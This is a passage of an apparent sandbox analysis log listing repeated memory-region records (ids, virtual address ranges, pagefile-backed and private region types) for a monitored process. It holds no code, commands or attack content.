0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12866 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12867 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12868 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12869 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12870 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12871 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12872 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12873 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12874 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12875 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12876 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12877 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12878 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12879 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12880 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12881 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12882 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12883 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12884 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12885 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12886 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12887 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12888 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12889 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12890 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12891 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12892 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12893 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12894 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12895 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12896 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12897 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12898 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12899 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12900 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12901 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12902 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12903 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12904 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12905 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12906 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12907 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12908 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12909 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12910 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12911 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12912 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12913 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12914 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12915 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12916 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12917 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12918 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12919 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12920 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12921 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12922 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12923 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12924 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12925 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12926 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12927 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12928 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12929 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12930 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12931 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12932 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12933 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12934 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12935 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12936 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12937 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12938 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12939 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12940 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12941 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12942 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12943 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12944 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 12945 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 12946 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12947 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12948 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12949 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12950 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12951 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12952 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12953 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12954 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12955 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12956 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12957 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12958 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12959 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12960 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12961 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12962 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12963 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12964 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12965 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12966 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12967 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12968 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12969 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12970 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12971 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12972 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12973 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12974 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12975 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12976 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12977 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12978 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12979 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12980 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12981 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12982 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12983 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12984 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12985 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12986 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12987 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12988 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12989 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12990 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12991 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12992 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12993 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12994 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12995 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12996 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12997 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12998 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12999 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13000 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13001 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13002 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13003 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13004 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13005 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13006 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13007 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13008 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13009 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13010 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13011 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13012 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13013 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13014 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13015 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13016 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13017 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13018 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13019 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13020 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13021 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13022 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13023 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13024 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13025 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13026 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13027 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13028 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13029 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13030 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13031 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13032 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13033 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13034 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13035 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13036 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13037 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13038 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13039 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13040 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13041 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13042 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13043 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13044 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13045 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13046 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13047 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13048 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13049 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13050 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13051 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13052 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13053 start_va = 